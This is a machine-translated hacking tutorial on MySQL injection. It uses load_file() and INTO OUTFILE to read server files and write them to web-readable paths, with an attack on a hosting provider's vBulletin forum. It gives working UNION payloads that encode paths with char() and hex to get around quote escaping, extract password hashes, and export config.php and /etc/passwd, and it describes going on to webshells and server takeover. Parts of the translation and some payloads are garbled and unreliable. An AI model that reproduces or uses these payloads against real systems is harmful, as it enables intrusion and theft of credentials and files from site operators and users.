Advanced SQL Injection with Mysql_mysql

article/figure Security Angel Angel[bst]

Objective

My SQL injection with MySQL ("The Hacker Defense July topic") has a more comprehensive introduction to MySQL, but there is a very harmful function, I did not mention in the article, because if you can apply this function flexibly, That PHP and even the security of the server will be greatly compromised, since the publication time of SQL injection with MySQL was during the summer vacation, I did not write this in the text, considering that many beginners, students and people with bad morals were using it, so this article was written in early May. After the publication of the topic, many people have been transferred to the study of Php+mysql injection, many new technologies will be dug up, we have mastered this aspect of the outstanding advanced skills will be announced. As for the comparison of the basic things, this article will not mention.

With

We know that in SQL statements, you can use a variety of MySQL built-in functions, often using database (), USER (), System_user (), Session_user (), Current_User () These functions are used to obtain information about the system, and a function that is more widely applied is load_file (), which functions by reading the file and returning the contents of the file as a string.
See here, should be able to think of what we can do, is to read some confidential documents, but also conditional restrictions:

• To read the file must be on the server
• You must specify a full path to the file
• Must have permission to read and the file must be fully readable
• To read the file must be less than max_allowed_packet

If the file does not exist, or cannot be read because of any of the above reasons, the function returns empty. More difficult to meet is the permissions, in Windows, if the NTFS is set properly, is not able to read the relevant files, when encountered only administrators can access files, users do not want to load_file out.

In the actual injection, we have two difficulties to solve:

• Absolute physical Path
• Construct a valid malformed statement

In many PHP programs, when submitting a wrong query, if display_errors = ON, the program will expose the absolute path of the Web directory, as long as you know the path, then for a can inject PHP program, the entire server security will be seriously threatened. The construction statement is already a trifle.

Use

Let's assume that the SQL statement for a program is as follows:

SELECT * from article WHERE articleid= $id

　　Note: Current condition: MAGIC_QUOTES_GPC = Off,c:/boot.ini readable.

At this point, we construct $id as:

-1 Union Select 1,1,1,1,load_file (' C:/boot.ini ')

Our query becomes:

SELECT * FROM article WHERE articleid=-1 Union SELECT 1,1,1,1,load_file (' C:/boot.ini ')

The program will display C:/boot.ini content, but now MAGIC_QUOTES_GPC = off the host is very few, how to construct the statement without quotes? Friends who have read SQL injection with MySQL must know that the char () function or the character is converted to 16, yes, they are.

　　Note: Current condition: MAGIC_QUOTES_GPC = On,c:/boot.ini readable.

We construct $id as:

-1 Union Select 1,1,1,load_file (chars, MB, 116 , C, C, C, c)

"Char (99,58,47,98,111,111,116,46,105,110,105)" is the ASCII code for "C:/boot.ini", and our query becomes:

SELECT * FROM article WHERE articleid=-1 Union Select 1, 1, 1, Load_file (char (99, 58, 47, 98, 111, 111, 116, 46, 105, (a))

We can also successfully read Boot.ini files, and the string to convert to 16, "C:/boot.ini" 16 is "0x633a2f626f6f742e696e69", so the above statement can be this:

SELECT * FROM article WHERE articleid=-1 Union Select 1,1,1,load_file (0x633a2f626f6f742e696e69)

Relatively short, look at each preference, you can enter the phpMyAdmin or mysql> under the following query to study slowly.

SELECT load_file ([string])

Of course, in practical applications, due to various conditions, the contents of the file may not be displayed, we can also use into outfile to export the file. We already know how to use, I do not say the details, look at an example to illustrate everything.

Instance

Www.***host.cn is China's famous FreeBSD host provider, we take him to test, because its forum is the calendar.php problem VBB forum, I do not need to go everywhere to find a vulnerable site (although everywhere). This is a complete security test. Just to get information, I didn't get into the server.

Here is a little bit of code on the root directory of VBB global.php, as follows:

<?php
//get rid of slashes in Get/post/cookie data
function stripslashesarray (&$arr ) {
while (the list ($key,$val) = each($arr )) {
if ($key!="templatesused" and $key!="argc" and $key!="argv" ) {
if (is_string($val) andstrtoupper ($key)!=$key OR (""). Intval($key) = ="$key" ))) {
$arr["$key"] = stripslashes($val );
else if (is_array($val) and($key = = ' http_post_vars ' OR $key = = ' http_get_vars ' OR strtoupper($key)!=$key )) {
$arr["$key"] = stripslashesarray($val );
}
}
}
return $arr ;
}
if (get_magic_quotes_gpc() and Is_array($GLOBALS )) {
if (Isset ($attachment )) {
$GLOBALS[' attachment '] = addslashes($GLOBALS['attachment ' ]);
}
if (Isset ($avatarfile )) {
$GLOBALS[' avatarfile '] = addslashes($GLOBALS['avatarfile ' ]);
}
$GLOBALS = stripslashesarray($GLOBALS );
}

set_magic_quotes_runtime(0 );

?>

The function of this code is if MAGIC_QUOTES_GPC open, remove all the special characters in front of the escape character, so, regardless of php.ini MAGIC_QUOTES_GPC state, we entered the single quotes have no effect, we can safely injected. Oh.

We know, submit:

/calendar.php?action=edit&eventid=1 UNION SELECT 1, 1, 1, 1, username, password from user WHERE userid=1

It is possible to get the username and password MD5 hash, but it is not shown for special reasons, but I know from experience that there is no construction error, so we can read and export to a file.
Because I accidentally accessed a file containing phpinfo (), so know the absolute path of the web, from the results of the visit to the site, found that a download system is to generate HTML files, if that directory has no writable permissions, can not generate HTML files, but this is not the focus of this article, We now have the following information:

• Web Absolute path:/home/4ngel
• Writable directory path:/home/4ngel/soft/
• MAGIC_QUOTES_GPC = On

and host root compared to the forum admin is nothing, I am not interested in forum admin, we want to read the forum's profile and/etc/passwd, know the connection information MySQL, you can start from here, write Webshell or other things, know/etc /PASSWD We can run the code. Go directly from SSH.

VBB Forum configuration file in/home/4ngel/forum/admin/config.php, converted to ASCII code, submitted:

calendar.php?action=edit&eventid=1 UNION SELECT 1, 1, 1, 1, 1, Load_file (char (47, 104, 111, 109, 101, 47, 52, 110, 103, 101, 108, 47, 102, 111, 114, 117, 109, 47, 97, 100, 109, 105, 110, 47, 99, 111, 110, 102, 105, 103, 46, 112, 104, 11 2) from the user WHERE userid=1 into outfile '/home/4ngel/soft/cfg.txt '

Oh, remember to add a where to set a condition, otherwise, if the forum users a lot, then the exported file will be quite large. Or simply specify $eventid as a nonexistent value, instead of where, like this:

calendar.php?action=edit&eventid=-1 UNION SELECT 1, 1, 1, 1, 1, Load_file (char (47, 104, 111, 109, 101, 47, 52, 110) , 103, 101, 108, 47, 102, 111, 114, 117, 109, 47, 97, 100, 109, 105, 110, 47, 99, 111, 110, 102, 105, 103, 46, 112, 104, 1 ) from user into outfile '/home/4ngel/soft/cfg.txt '

/ETC/PASSWD converted to ASCII code, submitted:

Calendar.php?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1, Load_file (char (47, 101, 116, 99, 47, 112, 97, 115, 115, 1 ) from the user into outfile '/home/4ngel/soft/etcpwd.txt '

Notice that the top of the forum will receive the following error message:

Warning:mysql_fetch_array (): supplied argument isn't a valid MySQL result resource IN/HOME/4NGEL/FORUM/ADMIN/DB_MYSQL.P HP on line 154

Experience tells us that the file export was successful and submitted:

Http://www.xxxhost.cn/soft/cfg.txt
Http://www.xxxhost.cn/soft/etcpwd.txt

Content Hua Hua out, and the night and pig eggs they invade gray time, a display password, deception, landing backstage, upload back door, read config.php, a series of steps, I a load_file () on the finish. Is it a big threat? As shown in figure:

I remember in a group that everyone is through 9****.net this station, and into the black and white server, there is no way to black and white bull, had to curve. With the Load_file () function, know some information can enter the black and white in the server, the process and the above, the use of show.php loopholes, direct load_file out of the program's configuration file, know the MySQL information, remote connection, write database export files, It's easy to get server admin.

Postscript

Because of the harm too much, I have been not too dare to publish, I believe that some people in the country know. It's just not public. After repeated consideration or decided to release, I hope you have mastered the future, do not have to do any destructive operations on the domestic site. Thank you for your cooperation!